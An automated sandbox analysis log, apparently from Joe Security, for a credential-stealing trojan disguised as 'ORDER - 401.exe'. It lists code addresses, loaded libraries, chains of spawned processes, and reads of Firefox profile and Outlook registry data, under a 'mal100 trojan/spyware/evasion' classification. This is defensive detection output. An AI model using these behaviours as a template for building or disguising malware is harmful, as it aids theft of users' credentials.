                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01029EB05_2_01029EB0
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeCode function: 7_2_027D2A487_2_027D2A48
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeCode function: 7_2_027D2A3C7_2_027D2A3C
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeCode function: 7_2_027DB0787_2_027DB078
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeCode function: 7_2_027DB0317_2_027DB031
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeCode function: 7_2_027D28F87_2_027D28F8
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeCode function: 7_2_027D49187_2_027D4918
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeCode function: 7_2_027DCE147_2_027DCE14
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeCode function: 7_2_027D46F87_2_027D46F8
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeCode function: 7_2_027D46F07_2_027D46F0
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeCode function: 7_2_027F34D87_2_027F34D8
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_043844208_2_04384420
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_043924468_2_04392446
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0438E4F68_2_0438E4F6
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042E05358_2_042E0535
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_043A05918_2_043A0591
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042FC6E08_2_042FC6E0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042E07708_2_042E0770
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_043047508_2_04304750
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042DC7C08_2_042DC7C0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_043720008_2_04372000
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042D01008_2_042D0100
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0437A1188_2_0437A118
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_043681588_2_04368158
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_043A01AA8_2_043A01AA
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_043941A28_2_043941A2
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_043981CC8_2_043981CC
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_043802748_2_04380274
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_043602C08_2_043602C0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0439A3528_2_0439A352
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_043A03E68_2_043A03E6
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042EE3F08_2_042EE3F0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042E0C008_2_042E0C00
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04380CB58_2_04380CB5
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042D0CF28_2_042D0CF2
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0437CD1F8_2_0437CD1F
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042EAD008_2_042EAD00
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042F8DBF8_2_042F8DBF
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042DADE08_2_042DADE0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0439EE268_2_0439EE26
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042E0E598_2_042E0E59
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0439CE938_2_0439CE93
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042F2E908_2_042F2E90
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0439EEDB8_2_0439EEDB
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04300F308_2_04300F30
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04382F308_2_04382F30
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04322F288_2_04322F28
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04354F408_2_04354F40
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0435EFA08_2_0435EFA0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042ECFE08_2_042ECFE0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042D2FC88_2_042D2FC8
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042E480D8_2_042E480D
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042E28408_2_042E2840
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042EA8408_2_042EA840
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042C68B88_2_042C68B8
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0430E8F08_2_0430E8F0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042F69628_2_042F6962
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042E29A08_2_042E29A0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_043AA9A68_2_043AA9A6
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042DEA808_2_042DEA80
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0439AB408_2_0439AB40
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04396BD78_2_04396BD7
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0439F43F8_2_0439F43F
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042D14608_2_042D1460
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_043975718_2_04397571
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0437D5B08_2_0437D5B0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_043A95C38_2_043A95C3
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_043256308_2_04325630
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_043916CC8_2_043916CC
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0439F7B08_2_0439F7B0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_043970E98_2_043970E9
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0439F0E08_2_0439F0E0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042E70C08_2_042E70C0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0438F0CC8_2_0438F0CC
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_043AB16B8_2_043AB16B
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0431516C8_2_0431516C
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042CF1728_2_042CF172
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042EB1B08_2_042EB1B0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042E52A08_2_042E52A0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_043812ED8_2_043812ED
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042FB2C08_2_042FB2C0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0439132D8_2_0439132D
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042CD34C8_2_042CD34C
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0432739A8_2_0432739A
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04359C328_2_04359C32
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0439FCF28_2_0439FCF2
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04397D738_2_04397D73
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04391D5A8_2_04391D5A
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042E3D408_2_042E3D40
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042FFDC08_2_042FFDC0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042E9EB08_2_042E9EB0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0439FF098_2_0439FF09
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0439FFB18_2_0439FFB1
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042E1F928_2_042E1F92
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0434D8008_2_0434D800
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042E38E08_2_042E38E0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_043759108_2_04375910
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042E99508_2_042E9950
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042FB9508_2_042FB950
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04353A6C8_2_04353A6C
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0439FA498_2_0439FA49
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04397A468_2_04397A46
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04325AA08_2_04325AA0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0437DAAC8_2_0437DAAC
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04381AA38_2_04381AA3
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0438DAC68_2_0438DAC6
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0439FB768_2_0439FB76
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_042FFB808_2_042FFB80
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04355BF08_2_04355BF0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0431DBF98_2_0431DBF9
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_001B23908_2_001B2390
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_001CC0A08_2_001CC0A0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_001AD2B88_2_001AD2B8
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_001AD2C08_2_001AD2C0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_001AB4C08_2_001AB4C0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_001AD4E08_2_001AD4E0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_001AB6108_2_001AB610
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_001AB6048_2_001AB604
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_001B5A408_2_001B5A40
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_001B3BF98_2_001B3BF9
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_001B3C408_2_001B3C40
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_045FE4438_2_045FE443
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_045FE7E18_2_045FE7E1
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_045FE3288_2_045FE328
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_045FD8A88_2_045FD8A8
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_045FCB638_2_045FCB63
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: String function: 0435F290 appears 105 times
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: String function: 04327E54 appears 111 times
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: String function: 042CB970 appears 280 times
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: String function: 04315130 appears 58 times
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: String function: 0434EA12 appears 86 times
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: String function: 01067E54 appears 101 times
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: String function: 0108EA12 appears 86 times
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: String function: 0100B970 appears 264 times
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: String function: 01055130 appears 58 times
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: String function: 0109F290 appears 105 times
                Source: ORDER - 401.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                Source: ORDER - 401.exe, 00000000.00000002.2291861064.00000000008DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ORDER - 401.exe
                Source: ORDER - 401.exe, 00000000.00000002.2297029541.0000000007110000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs ORDER - 401.exe
                Source: ORDER - 401.exe, 00000000.00000002.2296779398.0000000006FF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs ORDER - 401.exe
                Source: ORDER - 401.exe, 00000000.00000000.2207952979.00000000002CE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameerzH.exe4 vs ORDER - 401.exe
                Source: ORDER - 401.exe, 00000000.00000002.2292905920.0000000002597000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs ORDER - 401.exe
                Source: ORDER - 401.exe, 00000005.00000002.2477842446.000000000110D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ORDER - 401.exe
                Source: ORDER - 401.exe, 00000005.00000002.2477292832.0000000000BB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEUNATT.EXED vs ORDER - 401.exe
                Source: ORDER - 401.exe, 00000005.00000002.2477292832.0000000000B98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEUNATT.EXED vs ORDER - 401.exe
                Source: ORDER - 401.exeBinary or memory string: OriginalFilenameerzH.exe4 vs ORDER - 401.exe
                Source: ORDER - 401.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: ORDER - 401.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, HsSXbpVbC9Doqnq3or.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, HsSXbpVbC9Doqnq3or.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, HsSXbpVbC9Doqnq3or.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, HsSXbpVbC9Doqnq3or.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, HsSXbpVbC9Doqnq3or.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, HsSXbpVbC9Doqnq3or.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, HtyuSpR3Ls9Z4EJjgG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, HtyuSpR3Ls9Z4EJjgG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/2@16/13
                Source: C:\Users\user\Desktop\ORDER - 401.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORDER - 401.exe.logJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile created: C:\Users\user\AppData\Local\Temp\086604I_PJump to behavior
                Source: ORDER - 401.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: ORDER - 401.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: ieUnatt.exe, 00000008.00000002.4676389465.0000000002655000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4676389465.00000000026AA000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2661202577.00000000026AA000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2661202577.0000000002676000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4676389465.0000000002676000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2659256243.000000000268A000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2659343185.0000000002676000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: ORDER - 401.exeVirustotal: Detection: 77%
                Source: ORDER - 401.exeReversingLabs: Detection: 63%
                Source: unknownProcess created: C:\Users\user\Desktop\ORDER - 401.exe "C:\Users\user\Desktop\ORDER - 401.exe"
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess created: C:\Users\user\Desktop\ORDER - 401.exe "C:\Users\user\Desktop\ORDER - 401.exe"
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess created: C:\Users\user\Desktop\ORDER - 401.exe "C:\Users\user\Desktop\ORDER - 401.exe"
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess created: C:\Users\user\Desktop\ORDER - 401.exe "C:\Users\user\Desktop\ORDER - 401.exe"
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeProcess created: C:\Windows\SysWOW64\ieUnatt.exe "C:\Windows\SysWOW64\ieUnatt.exe"
                Source: C:\Windows\SysWOW64\ieUnatt.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess created: C:\Users\user\Desktop\ORDER - 401.exe "C:\Users\user\Desktop\ORDER - 401.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess created: C:\Users\user\Desktop\ORDER - 401.exe "C:\Users\user\Desktop\ORDER - 401.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess created: C:\Users\user\Desktop\ORDER - 401.exe "C:\Users\user\Desktop\ORDER - 401.exe"Jump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeProcess created: C:\Windows\SysWOW64\ieUnatt.exe "C:\Windows\SysWOW64\ieUnatt.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\ORDER - 401.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: ORDER - 401.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: ORDER - 401.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: ieUnAtt.pdbGCTL source: ORDER - 401.exe, 00000005.00000002.2477292832.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, ORDER - 401.exe, 00000005.00000002.2477292832.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, ZaZCnGdXtY.exe, 00000007.00000002.4676619374.0000000000812000.00000004.00000020.00020000.00000000.sdmp, ZaZCnGdXtY.exe, 00000007.00000002.4676619374.0000000000831000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ZaZCnGdXtY.exe, 00000007.00000002.4676883405.0000000000CAE000.00000002.00000001.01000000.0000000C.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4676537211.0000000000CAE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: ieUnAtt.pdb source: ORDER - 401.exe, 00000005.00000002.2477292832.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, ORDER - 401.exe, 00000005.00000002.2477292832.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, ZaZCnGdXtY.exe, 00000007.00000002.4676619374.0000000000812000.00000004.00000020.00020000.00000000.sdmp, ZaZCnGdXtY.exe, 00000007.00000002.4676619374.0000000000831000.00000004.00000020.00020000.00000000.sdmp
